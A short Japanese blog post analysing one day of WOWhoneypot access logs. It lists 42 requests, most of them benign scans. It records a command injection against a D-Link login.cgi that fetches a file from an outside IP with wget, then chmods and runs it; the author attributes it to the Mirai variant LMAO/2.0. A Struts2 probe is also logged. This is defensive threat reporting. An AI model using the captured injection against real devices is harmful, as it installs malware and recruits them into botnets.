ハニーポットのログ分析(2018/08/17)
WOWhoneypotの2018/08/17(金) (運用75日目)の簡易分析です。
本日の総アクセス件数は 42件です。以下が全アクセスログです。
36 2018-08-17 GET /
1 2018-08-17 HEAD /
1 2018-08-17 GET /sitemap.xml
1 2018-08-17 GET /robots.txt
1 2018-08-17 GET /favicon.ico
1 2018-08-17 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.67[.]245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-17 GET /index.action
これらのうち、sitemap.xmlやrobots.txtへのアクセスはサイト構造解析のためのスキャンと思われます。
攻撃は以下の2つ。D-Linkの脆弱性を攻撃するMirai亜種LMAO/2.0とStruts2の脆弱性に対する調査行為です。
1 2018-08-17 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-17 GET /index.action
本日のハンティングログは以下です。Mirai亜種LMAO/2.0です。
1 2018-08-17 wget hxxp://80.211.67[.]245/k
以上です。